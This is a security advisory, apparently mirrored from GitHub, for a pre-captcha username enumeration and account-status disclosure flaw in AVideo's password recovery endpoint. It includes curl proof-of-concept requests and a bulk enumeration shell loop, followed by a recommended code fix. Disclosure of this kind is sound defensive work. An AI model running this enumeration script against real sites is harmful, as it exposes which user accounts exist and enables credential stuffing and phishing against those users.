GHSA-M99F-MMVG-3XMX

Vulnerability from github – Published: 2026-03-25 19:53 – Updated: 2026-03-25 19:53
VLAI?
Summary
AVideo has Pre-Captcha User Enumeration and Account Status Disclosure in Password Recovery Endpoint
Details

Summary

The password recovery endpoint at objects/userRecoverPass.php performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned — at scale and without solving any captcha — by observing three distinct JSON error responses.

Details

In objects/userRecoverPass.php, the request flow is:

  1. Line 11 — A User object is instantiated from unsanitized $_REQUEST['user'] with no authentication:
$user = new User(0, $_REQUEST['user'], false);
  1. Lines 27-29 — If the user does not exist, a distinct error is returned immediately:
if (empty($user->getStatus())) {
    $obj->error = __("User not found");
    die(json_encode($obj));
}
  1. Lines 31-33 — If the user exists but is not active, a different distinct error is returned:
if ($user->getStatus() !== 'a') {
    $obj->error = __("The user is not active");
    die(json_encode($obj));
}
  1. Lines 37-41 — Captcha validation only occurs after both user enumeration checks:
if (empty($_REQUEST['captcha'])) {
    $obj->error = __("Captcha is empty");
} else {
    require_once 'captcha.php';
    $valid = Captcha::validation($_REQUEST['captcha']);

This ordering creates a reliable oracle: requests that hit the captcha check confirm the user exists and is active, while the two earlier error messages reveal non-existence or inactive status — all without requiring a valid captcha.

By contrast, the registration endpoint (objects/userCreate.json.php) correctly validates the captcha at lines 32-42 before performing any user existence checks, confirming this ordering in the password recovery endpoint is a bug.

No rate limiting (rateLimitByIP) or brute force protection (bruteForceBlock) is applied to this endpoint. The framework's session-based DDOS protection is trivially bypassed by omitting cookies (each request gets a fresh session).

PoC

# 1. Test a non-existent user — returns "User not found" without captcha
curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
  -d 'user=nonexistent_user_xyz&captcha=' | jq .error
# Response: "User not found"

# 2. Test a valid active user — passes user checks, hits captcha validation
curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
  -d 'user=admin&captcha=' | jq .error
# Response: "Captcha is empty"

# 3. Test an inactive/banned user (if one exists) — returns distinct status message
curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
  -d 'user=banned_user&captcha=' | jq .error
# Response: "The user is not active"

# 4. Bulk enumeration script — no captcha solving required
for user in admin root test user1 user2 moderator editor; do
  result=$(curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
    -d "user=${user}&captcha=")
  error=$(echo "$result" | jq -r .error)
  if [ "$error" = "Captcha is empty" ]; then
    echo "[ACTIVE] $user"
  elif [ "$error" = "The user is not active" ]; then
    echo "[INACTIVE] $user"
  else
    echo "[NOT FOUND] $user"
  fi
done

Impact

  • Username enumeration: Attackers can determine which usernames are registered on the platform without any captcha or authentication barrier.
  • Account status disclosure: Attackers can distinguish between active, inactive, and non-existent accounts, revealing moderation/ban status.
  • Credential stuffing enablement: Confirmed valid usernames can be used in targeted password brute-force or credential stuffing attacks against the login endpoint.
  • Phishing: Knowledge of valid active accounts enables targeted social engineering attacks against real users.
  • No throttling: The absence of rate limiting on this endpoint allows high-speed automated enumeration.

Recommended Fix

Move the captcha validation before the user existence checks, and return a generic message regardless of user status:

// In objects/userRecoverPass.php, replace lines 26-41 with:

    header('Content-Type: application/json');

    // Validate captcha FIRST, before any user lookups
    if (empty($_REQUEST['captcha'])) {
        $obj->error = __("Captcha is empty");
        die(json_encode($obj));
    }
    require_once 'captcha.php';
    $valid = Captcha::validation($_REQUEST['captcha']);
    if (!$valid) {
        $obj->error = __("Your code is not valid");
        $obj->reloadCaptcha = true;
        die(json_encode($obj));
    }

    // After captcha passes, check user — but use generic message
    if (empty($user->getStatus()) || $user->getStatus() !== 'a' || empty($user->getEmail())) {
        // Generic message — do not reveal whether user exists or is active
        $obj->success = __("If this account exists, a recovery email has been sent");
        die(json_encode($obj));
    }

    // Proceed with actual password recovery...
    $recoverPass = $user->setRecoverPass();

Additionally, consider adding rateLimitByIP() to this endpoint as defense-in-depth.

Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33688"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-204"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T19:53:00Z",
    "nvd_published_at": "2026-03-23T19:16:42Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks **before** validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned \u2014 at scale and without solving any captcha \u2014 by observing three distinct JSON error responses.\n\n## Details\n\nIn `objects/userRecoverPass.php`, the request flow is:\n\n1. **Line 11** \u2014 A `User` object is instantiated from unsanitized `$_REQUEST[\u0027user\u0027]` with no authentication:\n```php\n$user = new User(0, $_REQUEST[\u0027user\u0027], false);\n```\n\n2. **Lines 27-29** \u2014 If the user does not exist, a distinct error is returned immediately:\n```php\nif (empty($user-\u003egetStatus())) {\n    $obj-\u003eerror = __(\"User not found\");\n    die(json_encode($obj));\n}\n```\n\n3. **Lines 31-33** \u2014 If the user exists but is not active, a different distinct error is returned:\n```php\nif ($user-\u003egetStatus() !== \u0027a\u0027) {\n    $obj-\u003eerror = __(\"The user is not active\");\n    die(json_encode($obj));\n}\n```\n\n4. **Lines 37-41** \u2014 Captcha validation only occurs **after** both user enumeration checks:\n```php\nif (empty($_REQUEST[\u0027captcha\u0027])) {\n    $obj-\u003eerror = __(\"Captcha is empty\");\n} else {\n    require_once \u0027captcha.php\u0027;\n    $valid = Captcha::validation($_REQUEST[\u0027captcha\u0027]);\n```\n\nThis ordering creates a reliable oracle: requests that hit the captcha check confirm the user exists and is active, while the two earlier error messages reveal non-existence or inactive status \u2014 all without requiring a valid captcha.\n\nBy contrast, the registration endpoint (`objects/userCreate.json.php`) correctly validates the captcha at lines 32-42 **before** performing any user existence checks, confirming this ordering in the password recovery endpoint is a bug.\n\nNo rate limiting (`rateLimitByIP`) or brute force protection (`bruteForceBlock`) is applied to this endpoint. The framework\u0027s session-based DDOS protection is trivially bypassed by omitting cookies (each request gets a fresh session).\n\n## PoC\n\n```bash\n# 1. Test a non-existent user \u2014 returns \"User not found\" without captcha\ncurl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n  -d \u0027user=nonexistent_user_xyz\u0026captcha=\u0027 | jq .error\n# Response: \"User not found\"\n\n# 2. Test a valid active user \u2014 passes user checks, hits captcha validation\ncurl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n  -d \u0027user=admin\u0026captcha=\u0027 | jq .error\n# Response: \"Captcha is empty\"\n\n# 3. Test an inactive/banned user (if one exists) \u2014 returns distinct status message\ncurl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n  -d \u0027user=banned_user\u0026captcha=\u0027 | jq .error\n# Response: \"The user is not active\"\n\n# 4. Bulk enumeration script \u2014 no captcha solving required\nfor user in admin root test user1 user2 moderator editor; do\n  result=$(curl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n    -d \"user=${user}\u0026captcha=\")\n  error=$(echo \"$result\" | jq -r .error)\n  if [ \"$error\" = \"Captcha is empty\" ]; then\n    echo \"[ACTIVE] $user\"\n  elif [ \"$error\" = \"The user is not active\" ]; then\n    echo \"[INACTIVE] $user\"\n  else\n    echo \"[NOT FOUND] $user\"\n  fi\ndone\n```\n\n## Impact\n\n- **Username enumeration**: Attackers can determine which usernames are registered on the platform without any captcha or authentication barrier.\n- **Account status disclosure**: Attackers can distinguish between active, inactive, and non-existent accounts, revealing moderation/ban status.\n- **Credential stuffing enablement**: Confirmed valid usernames can be used in targeted password brute-force or credential stuffing attacks against the login endpoint.\n- **Phishing**: Knowledge of valid active accounts enables targeted social engineering attacks against real users.\n- **No throttling**: The absence of rate limiting on this endpoint allows high-speed automated enumeration.\n\n## Recommended Fix\n\nMove the captcha validation before the user existence checks, and return a generic message regardless of user status:\n\n```php\n// In objects/userRecoverPass.php, replace lines 26-41 with:\n\n    header(\u0027Content-Type: application/json\u0027);\n\n    // Validate captcha FIRST, before any user lookups\n    if (empty($_REQUEST[\u0027captcha\u0027])) {\n        $obj-\u003eerror = __(\"Captcha is empty\");\n        die(json_encode($obj));\n    }\n    require_once \u0027captcha.php\u0027;\n    $valid = Captcha::validation($_REQUEST[\u0027captcha\u0027]);\n    if (!$valid) {\n        $obj-\u003eerror = __(\"Your code is not valid\");\n        $obj-\u003ereloadCaptcha = true;\n        die(json_encode($obj));\n    }\n\n    // After captcha passes, check user \u2014 but use generic message\n    if (empty($user-\u003egetStatus()) || $user-\u003egetStatus() !== \u0027a\u0027 || empty($user-\u003egetEmail())) {\n        // Generic message \u2014 do not reveal whether user exists or is active\n        $obj-\u003esuccess = __(\"If this account exists, a recovery email has been sent\");\n        die(json_encode($obj));\n    }\n\n    // Proceed with actual password recovery...\n    $recoverPass = $user-\u003esetRecoverPass();\n```\n\nAdditionally, consider adding `rateLimitByIP()` to this endpoint as defense-in-depth.",
  "id": "GHSA-m99f-mmvg-3xmx",
  "modified": "2026-03-25T19:53:00Z",
  "published": "2026-03-25T19:53:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33688"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has Pre-Captcha User Enumeration and Account Status Disclosure in Password Recovery Endpoint"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.